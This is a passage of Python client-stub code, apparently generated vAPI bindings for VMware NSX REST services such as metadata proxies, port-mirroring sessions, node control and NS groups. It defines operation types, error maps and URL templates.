            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        delete_input_value_validator_list = [
        ]
        delete_output_validator_list = [
        ]
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/md-proxies/{proxy-id}',
            # maps the python parameter name to the {placeholder} in the URL
            path_variables={
                'proxy_id': 'proxy-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for get operation
        get_input_type = type.StructType('operation-input', {
            'proxy_id': type.StringType(),
        })
        get_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        get_input_value_validator_list = [
        ]
        get_output_validator_list = [
        ]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/md-proxies/{proxy-id}',
            path_variables={
                'proxy_id': 'proxy-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for list operation
        # Standard NSX pagination/sorting parameters, all optional.
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        list_input_value_validator_list = [
        ]
        list_output_validator_list = [
        ]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/md-proxies',
            path_variables={
            },
            query_parameters={
                'cursor': 'cursor',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json'
        )
        # properties for update operation
        update_input_type = type.StructType('operation-input', {
            'proxy_id': type.StringType(),
            'metadata_proxy': type.ReferenceType('com.vmware.nsx.model_client', 'MetadataProxy'),
        })
        update_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        update_input_value_validator_list = [
        ]
        update_output_validator_list = [
        ]
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/md-proxies/{proxy-id}',
            request_body_parameter='metadata_proxy',
            path_variables={
                'proxy_id': 'proxy-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # Operation registry: input/output types, error maps, validators and
        # task handling per operation name.
        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'MetadataProxy'),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': create_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': delete_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'MetadataProxy'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'MetadataProxyListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'MetadataProxy'),
                'errors': update_error_dict,
                'input_value_validator_list': update_input_value_validator_list,
                'output_validator_list': update_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.md_proxies',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _MirrorSessionsStub(ApiInterfaceStub):
    """
    REST stub for the ``com.vmware.nsx.mirror_sessions`` service
    (``/api/v1/mirror-sessions``): create/delete/get/list/update of
    PortMirroringSession resources plus a ``verify`` action.

    Unlike the simpler sibling stubs, operations that carry a
    PortMirroringSession payload attach ``HasFieldsOfValidator`` --
    presumably because the payload is polymorphic; verify against the
    model definition.  NOTE(review): this looks like machine-generated
    vAPI binding code; prefer regenerating over hand-editing.
    """
    def __init__(self, config):
        """Assemble per-operation input types, error maps, validators and
        REST metadata, then register them with :class:`ApiInterfaceStub`.

        :param config: vAPI stub configuration forwarded to the base class.
        """
        # properties for create operation
        create_input_type = type.StructType('operation-input', {
            # Wire name of the body parameter; must match
            # request_body_parameter below.
            'port_mirroring_session': type.ReferenceType('com.vmware.nsx.model_client', 'PortMirroringSession'),
        })
        create_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        create_input_value_validator_list = [
            HasFieldsOfValidator()
        ]
        create_output_validator_list = [
            HasFieldsOfValidator()
        ]
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/mirror-sessions',
            request_body_parameter='port_mirroring_session',
            path_variables={
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for delete operation
        delete_input_type = type.StructType('operation-input', {
            'mirror_session_id': type.StringType(),
        })
        delete_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        delete_input_value_validator_list = [
        ]
        delete_output_validator_list = [
        ]
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/mirror-sessions/{mirror-session-id}',
            # maps the python parameter name to the {placeholder} in the URL
            path_variables={
                'mirror_session_id': 'mirror-session-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for get operation
        get_input_type = type.StructType('operation-input', {
            'mirror_session_id': type.StringType(),
        })
        get_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        get_input_value_validator_list = [
        ]
        get_output_validator_list = [
            HasFieldsOfValidator()
        ]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/mirror-sessions/{mirror-session-id}',
            path_variables={
                'mirror_session_id': 'mirror-session-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for list operation
        # Standard NSX pagination/sorting parameters, all optional.
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        list_input_value_validator_list = [
        ]
        list_output_validator_list = [
            HasFieldsOfValidator()
        ]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/mirror-sessions',
            path_variables={
            },
            query_parameters={
                'cursor': 'cursor',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json'
        )
        # properties for update operation
        update_input_type = type.StructType('operation-input', {
            'mirror_session_id': type.StringType(),
            'port_mirroring_session': type.ReferenceType('com.vmware.nsx.model_client', 'PortMirroringSession'),
        })
        update_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        update_input_value_validator_list = [
            HasFieldsOfValidator()
        ]
        update_output_validator_list = [
            HasFieldsOfValidator()
        ]
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/mirror-sessions/{mirror-session-id}',
            request_body_parameter='port_mirroring_session',
            path_variables={
                'mirror_session_id': 'mirror-session-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for verify operation
        verify_input_type = type.StructType('operation-input', {
            'mirror_session_id': type.StringType(),
        })
        verify_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        verify_input_value_validator_list = [
        ]
        verify_output_validator_list = [
        ]
        verify_rest_metadata = OperationRestMetadata(
            http_method='POST',
            # The 'action=verify' selector is baked into the URL template
            # rather than passed through query_parameters.
            url_template='/api/v1/mirror-sessions/{mirror-session-id}?action=verify',
            path_variables={
                'mirror_session_id': 'mirror-session-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # Operation registry: input/output types, error maps, validators and
        # task handling per operation name.
        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'PortMirroringSession'),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': create_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': delete_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'PortMirroringSession'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'PortMirroringSessionListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'PortMirroringSession'),
                'errors': update_error_dict,
                'input_value_validator_list': update_input_value_validator_list,
                'output_validator_list': update_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'verify': {
                'input_type': verify_input_type,
                'output_type': type.VoidType(),
                'errors': verify_error_dict,
                'input_value_validator_list': verify_input_value_validator_list,
                'output_validator_list': verify_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
            'verify': verify_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.mirror_sessions',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _NetworkMigrationSpecsStub(ApiInterfaceStub):
    """Generated stub for the com.vmware.nsx.network_migration_specs
    service: CRUD operations on network migration spec templates."""

    def __init__(self, config):
        _MODEL = 'com.vmware.nsx.model_client'

        def _std_errors():
            # Every operation on this service reports the same five
            # standard vAPI errors; build a fresh dict per operation.
            return {
                'com.vmware.vapi.std.errors.' + suffix:
                    type.ReferenceType(
                        'com.vmware.vapi.std.errors_client', cls)
                for suffix, cls in (
                    ('service_unavailable', 'ServiceUnavailable'),
                    ('invalid_request', 'InvalidRequest'),
                    ('internal_server_error', 'InternalServerError'),
                    ('unauthorized', 'Unauthorized'),
                    ('not_found', 'NotFound'),
                )
            }

        def _spec_struct():
            # Polymorphic request/response payload validated against
            # NetworkMigrationSpec.
            return type.DynamicStructType(
                'vmware.vapi.dynamic_struct', {}, VapiStruct,
                [type.ReferenceType(_MODEL, 'NetworkMigrationSpec')])

        # -- create ------------------------------------------------------
        create_input_type = type.StructType('operation-input', {
            'network_migration_spec': _spec_struct(),
        })
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/network-migration-specs',
            request_body_parameter='network_migration_spec',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # -- delete ------------------------------------------------------
        delete_input_type = type.StructType('operation-input', {
            'template_id': type.StringType(),
        })
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/network-migration-specs/{template-id}',
            path_variables={'template_id': 'template-id'},
            query_parameters={},
            content_type='application/json')

        # -- get ---------------------------------------------------------
        get_input_type = type.StructType('operation-input', {
            'template_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/network-migration-specs/{template-id}',
            path_variables={'template_id': 'template-id'},
            query_parameters={},
            content_type='application/json')

        # -- list --------------------------------------------------------
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'include_system_owned': type.OptionalType(type.BooleanType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
            'type': type.OptionalType(type.StringType()),
        })
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/network-migration-specs',
            path_variables={},
            # Query parameter wire names match the field names 1:1.
            query_parameters={name: name for name in (
                'cursor', 'include_system_owned', 'included_fields',
                'page_size', 'sort_ascending', 'sort_by', 'type')},
            content_type='application/json')

        # -- update ------------------------------------------------------
        update_input_type = type.StructType('operation-input', {
            'template_id': type.StringType(),
            'network_migration_spec': _spec_struct(),
        })
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/network-migration-specs/{template-id}',
            request_body_parameter='network_migration_spec',
            path_variables={'template_id': 'template-id'},
            query_parameters={},
            content_type='application/json')

        def _op(input_type, output_type, validate_input, validate_output):
            # validate_*: whether a HasFieldsOfValidator guards that side.
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': _std_errors(),
                'input_value_validator_list':
                    [HasFieldsOfValidator()] if validate_input else [],
                'output_validator_list':
                    [HasFieldsOfValidator()] if validate_output else [],
                'task_type': TaskType.NONE,
            }

        operations = {
            'create': _op(create_input_type, _spec_struct(), True, True),
            'delete': _op(delete_input_type, type.VoidType(), False, False),
            'get': _op(get_input_type, _spec_struct(), False, True),
            'list': _op(
                list_input_type,
                type.ReferenceType(_MODEL, 'NetworkMigrationSpecListResult'),
                False, True),
            'update': _op(update_input_type, _spec_struct(), True, True),
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.network_migration_specs',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _NodeStub(ApiInterfaceStub):
    """Generated stub for the com.vmware.nsx.node service: read/update
    node properties and trigger restart / shutdown / set-system-time."""

    def __init__(self, config):
        _MODEL = 'com.vmware.nsx.model_client'

        def _errors(with_concurrent_change=False):
            # Standard vAPI error set; set_system_time additionally
            # reports ConcurrentChange (inserted to keep the generated
            # ordering: ... internal_server_error, concurrent_change,
            # unauthorized ...).
            pairs = [
                ('service_unavailable', 'ServiceUnavailable'),
                ('invalid_request', 'InvalidRequest'),
                ('internal_server_error', 'InternalServerError'),
                ('unauthorized', 'Unauthorized'),
                ('not_found', 'NotFound'),
            ]
            if with_concurrent_change:
                pairs.insert(3, ('concurrent_change', 'ConcurrentChange'))
            return {
                'com.vmware.vapi.std.errors.' + suffix:
                    type.ReferenceType(
                        'com.vmware.vapi.std.errors_client', cls)
                for suffix, cls in pairs
            }

        def _node_properties():
            return type.ReferenceType(_MODEL, 'NodeProperties')

        # -- get ---------------------------------------------------------
        get_input_type = type.StructType('operation-input', {})
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/node',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # -- restart -----------------------------------------------------
        restart_input_type = type.StructType('operation-input', {})
        restart_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/node?action=restart',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # -- setsystemtime -----------------------------------------------
        setsystemtime_input_type = type.StructType('operation-input', {
            'node_time': type.ReferenceType(_MODEL, 'NodeTime'),
        })
        setsystemtime_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/node?action=set_system_time',
            request_body_parameter='node_time',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # -- shutdown ----------------------------------------------------
        shutdown_input_type = type.StructType('operation-input', {})
        shutdown_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/node?action=shutdown',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # -- update ------------------------------------------------------
        update_input_type = type.StructType('operation-input', {
            'node_properties': _node_properties(),
        })
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/node',
            request_body_parameter='node_properties',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        def _op(input_type, output_type, errors):
            # No operation on this service uses value validators.
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': errors,
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            }

        operations = {
            'get': _op(get_input_type, _node_properties(), _errors()),
            'restart': _op(restart_input_type, type.VoidType(), _errors()),
            'setsystemtime': _op(
                setsystemtime_input_type, type.VoidType(),
                _errors(with_concurrent_change=True)),
            'shutdown': _op(shutdown_input_type, type.VoidType(), _errors()),
            'update': _op(update_input_type, _node_properties(), _errors()),
        }
        rest_metadata = {
            'get': get_rest_metadata,
            'restart': restart_rest_metadata,
            'setsystemtime': setsystemtime_rest_metadata,
            'shutdown': shutdown_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.node',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _NormalizationsStub(ApiInterfaceStub):
    """Generated stub for the com.vmware.nsx.normalizations service:
    a single `list` operation over normalized resources."""

    def __init__(self, config):
        # Query parameter wire names match the field names 1:1; order
        # mirrors the generated metadata.
        query_param_names = (
            'preferred_normalization_type',
            'resource_id',
            'resource_type',
            'cursor',
            'included_fields',
            'page_size',
            'sort_ascending',
            'sort_by',
        )
        list_input_type = type.StructType('operation-input', {
            'preferred_normalization_type': type.StringType(),
            'resource_id': type.StringType(),
            'resource_type': type.StringType(),
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        # The operation reports the five standard vAPI errors.
        list_error_dict = {
            'com.vmware.vapi.std.errors.' + suffix:
                type.ReferenceType('com.vmware.vapi.std.errors_client', cls)
            for suffix, cls in (
                ('service_unavailable', 'ServiceUnavailable'),
                ('invalid_request', 'InvalidRequest'),
                ('internal_server_error', 'InternalServerError'),
                ('unauthorized', 'Unauthorized'),
                ('not_found', 'NotFound'),
            )
        }
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/normalizations',
            path_variables={},
            query_parameters={name: name for name in query_param_names},
            content_type='application/json')
        operations = {
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType(
                    'com.vmware.nsx.model_client',
                    'NormalizedResourceListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.normalizations',
            config=config, operations=operations,
            rest_metadata={'list': list_rest_metadata},
            is_vapi_rest=False)
class _NotificationWatchersStub(ApiInterfaceStub):
    """Generated stub for the com.vmware.nsx.notification_watchers
    service: CRUD operations on NotificationWatcher resources."""

    def __init__(self, config):
        _MODEL = 'com.vmware.nsx.model_client'

        def _std_errors():
            # Every operation reports the same five standard vAPI errors;
            # build a fresh dict per operation.
            return {
                'com.vmware.vapi.std.errors.' + suffix:
                    type.ReferenceType(
                        'com.vmware.vapi.std.errors_client', cls)
                for suffix, cls in (
                    ('service_unavailable', 'ServiceUnavailable'),
                    ('invalid_request', 'InvalidRequest'),
                    ('internal_server_error', 'InternalServerError'),
                    ('unauthorized', 'Unauthorized'),
                    ('not_found', 'NotFound'),
                )
            }

        def _watcher_ref():
            return type.ReferenceType(_MODEL, 'NotificationWatcher')

        # -- create ------------------------------------------------------
        create_input_type = type.StructType('operation-input', {
            'notification_watcher': _watcher_ref(),
        })
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/notification-watchers',
            request_body_parameter='notification_watcher',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # -- delete ------------------------------------------------------
        delete_input_type = type.StructType('operation-input', {
            'watcher_id': type.StringType(),
        })
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/notification-watchers/{watcher-id}',
            path_variables={'watcher_id': 'watcher-id'},
            query_parameters={},
            content_type='application/json')

        # -- get ---------------------------------------------------------
        get_input_type = type.StructType('operation-input', {
            'watcher_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/notification-watchers/{watcher-id}',
            path_variables={'watcher_id': 'watcher-id'},
            query_parameters={},
            content_type='application/json')

        # -- list --------------------------------------------------------
        list_input_type = type.StructType('operation-input', {})
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/notification-watchers',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # -- update ------------------------------------------------------
        update_input_type = type.StructType('operation-input', {
            'watcher_id': type.StringType(),
            'notification_watcher': _watcher_ref(),
        })
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/notification-watchers/{watcher-id}',
            request_body_parameter='notification_watcher',
            path_variables={'watcher_id': 'watcher-id'},
            query_parameters={},
            content_type='application/json')

        def _op(input_type, output_type):
            # No operation on this service uses value validators.
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            }

        operations = {
            'create': _op(create_input_type, _watcher_ref()),
            'delete': _op(delete_input_type, type.VoidType()),
            'get': _op(get_input_type, _watcher_ref()),
            'list': _op(
                list_input_type,
                type.ReferenceType(_MODEL, 'NotificationWatcherListResult')),
            'update': _op(update_input_type, _watcher_ref()),
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.notification_watchers',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _NsGroupsStub(ApiInterfaceStub):
    """Generated stub for the com.vmware.nsx.ns_groups service: CRUD on
    NSGroup resources plus add/remove of membership expressions."""

    def __init__(self, config):
        _MODEL = 'com.vmware.nsx.model_client'

        def _std_errors():
            # Every operation reports the same five standard vAPI errors;
            # build a fresh dict per operation.
            return {
                'com.vmware.vapi.std.errors.' + suffix:
                    type.ReferenceType(
                        'com.vmware.vapi.std.errors_client', cls)
                for suffix, cls in (
                    ('service_unavailable', 'ServiceUnavailable'),
                    ('invalid_request', 'InvalidRequest'),
                    ('internal_server_error', 'InternalServerError'),
                    ('unauthorized', 'Unauthorized'),
                    ('not_found', 'NotFound'),
                )
            }

        def _ns_group_ref():
            return type.ReferenceType(_MODEL, 'NSGroup')

        # -- addorremoveexpression ---------------------------------------
        addorremoveexpression_input_type = type.StructType(
            'operation-input', {
                'ns_group_id': type.StringType(),
                'ns_group_expression_list': type.ReferenceType(
                    _MODEL, 'NSGroupExpressionList'),
                'action': type.StringType(),
            })
        addorremoveexpression_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/ns-groups/{ns-group-id}',
            request_body_parameter='ns_group_expression_list',
            path_variables={'ns_group_id': 'ns-group-id'},
            query_parameters={'action': 'action'},
            content_type='application/json')

        # -- create ------------------------------------------------------
        create_input_type = type.StructType('operation-input', {
            'ns_group': _ns_group_ref(),
        })
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/ns-groups',
            request_body_parameter='ns_group',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # -- delete ------------------------------------------------------
        delete_input_type = type.StructType('operation-input', {
            'ns_group_id': type.StringType(),
            'force': type.OptionalType(type.BooleanType()),
        })
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/ns-groups/{ns-group-id}',
            path_variables={'ns_group_id': 'ns-group-id'},
